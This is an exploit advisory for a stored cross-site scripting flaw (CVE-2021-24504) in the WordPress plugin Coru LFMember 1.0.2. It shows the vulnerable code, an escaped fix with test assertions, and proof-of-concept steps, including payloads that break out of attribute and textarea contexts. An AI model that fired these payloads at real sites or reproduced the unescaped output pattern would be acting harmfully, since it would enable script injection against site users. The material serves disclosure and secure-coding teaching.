WordPress Coru LFMember 1.0.2 Cross Site Scripting
| CVE | Category | Price | Severity |
|---|---|---|---|
| CVE-2021-24504 | CWE-79 | $500 | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2022-04-26 |

CPE: cpe:/a:wordpress:coru-lfmember:1.0.2
Source: https://cxsecurity.com/ascii/WLB-2022040099 (copy below)

# Exploit Title: WordPress Plugin Coru LFMember - Stored Cross Site Scripting
# Date: 26-04-2022
# Exploit Author: Mariam Tariq - HunterSherlock
# Vendor Homepage: https://wordpress.org/plugins/Coru LFMember/
# Version: 1.0.2
# Tested on: Firefox
# Contact me: [email protected]
# Vulnerable Code:
```php
<?php // Vulnerable code: stored values are printed without output escaping ?>
<!-- attribute context: game_image is printed raw, so a stored `"` closes the value attribute -->
<td class="manage-column"><input type="text" value="<?php print $result['game_image'] ?>" name="game_image[]" /></td>
<!-- element text context: stripslashes() only removes backslashes, it does not encode < or > -->
<td class="manage-column"><?php print stripslashes($result['game_name_short']) ?></td>
<td class="manage-column"><input type="text" value="<?php print stripslashes($result['game_name_long']) ?>" name="game_name_long[]" /></td>
<!-- textarea context: a stored `</textarea>` ends the element and everything after it is parsed as markup -->
<td class="manage-column"><textarea name="game_description[]" rows="4" cols="10"><?php print stripslashes($result['game_description']) ?></textarea></td>
<td class="manage-column"><input type="text" value="<?php print $result['game_link'] ?>" name="game_link[]" /></td>
```
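The same row with context-aware output escaping, as an added example (this is not the plugin's code or a vendor patch). It assumes `$result` carries the five keys shown above and uses WordPress's `esc_attr()`, `esc_html()` and `esc_textarea()`; the `function_exists` stand-ins are minimal `htmlspecialchars()` wrappers so the file also runs outside WordPress, and the test record at the bottom is constructed for this example.

```php
<?php
// Added example: the LFMember table row rendered with output escaping.
// Outside WordPress the esc_* functions are not defined, so provide stand-ins
// (assumption: ENT_QUOTES encoding is enough for these three contexts).
if (!function_exists('esc_attr')) {
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8'); }
}
if (!function_exists('esc_textarea')) {
    function esc_textarea($text) { return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8'); }
}

/**
 * Render one game row. Each stored value is escaped for the HTML context it
 * lands in: attribute value -> esc_attr(), element text -> esc_html(),
 * textarea body -> esc_textarea(). stripslashes() is kept because it only
 * undoes slashes added on save; it is not an escaping function.
 */
function render_game_row(array $result): string
{
    $image = esc_attr($result['game_image']);
    $short = esc_html(stripslashes($result['game_name_short']));
    $long  = esc_attr(stripslashes($result['game_name_long']));
    $desc  = esc_textarea(stripslashes($result['game_description']));
    $link  = esc_attr($result['game_link']);

    return '<tr>'
        . '<td class="manage-column"><input type="text" value="' . $image . '" name="game_image[]" /></td>'
        . '<td class="manage-column">' . $short . '</td>'
        . '<td class="manage-column"><input type="text" value="' . $long . '" name="game_name_long[]" /></td>'
        . '<td class="manage-column"><textarea name="game_description[]" rows="4" cols="10">' . $desc . '</textarea></td>'
        . '<td class="manage-column"><input type="text" value="' . $link . '" name="game_link[]" /></td>'
        . '</tr>';
}

// Constructed record for this example: a breakout payload per context
// (attribute values need the leading quote, the textarea needs </textarea>).
$attrPayload = '"><img src=x onerror=alert(1)>';
$result = [
    'game_image'       => $attrPayload,
    'game_name_short'  => '<img src=x onerror=alert(1)>',
    'game_name_long'   => $attrPayload,
    'game_description' => '</textarea><img src=x onerror=alert(1)>',
    'game_link'        => $attrPayload,
];

$html = render_game_row($result);
// With escaping applied, no tag from the stored values survives as markup.
assert(strpos($html, '<img') === false);
assert(strpos($html, '&lt;img src=x onerror=alert(1)&gt;') !== false);
echo $html, PHP_EOL;
```

Run it with `php render_game_row.php`: the echoed row shows every stored payload encoded as text, so the browser renders the `<img>` as literal characters inside the input, cell and textarea instead of executing it. Escaping on output (rather than trying to strip tags on save) is the fix that holds for every field regardless of which context it is later printed into.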
# POC
1. Install the Coru LFMember WordPress plugin and activate it.
2. Go to LFMember -> Add New and enter the payload `><img src=x onerror=alert(1)>` in the fields listed, i.e. Game Image Name, Game Short Name, Game Long Name, Game Description, and Links to.
3. The payload is saved unescaped and the XSS fires every time the page that renders these fields is loaded.

Note on the rendering contexts in the code above: Game Short Name is printed directly into a table cell, so a bare tag is enough there; the three fields printed into `value="..."` attributes need a closing `"` in front of the tag, and Game Description sits inside a `<textarea>`, which has to be closed with `</textarea>` before a tag is parsed as markup.
## POC Image
https://imgur.com/kZDtIVz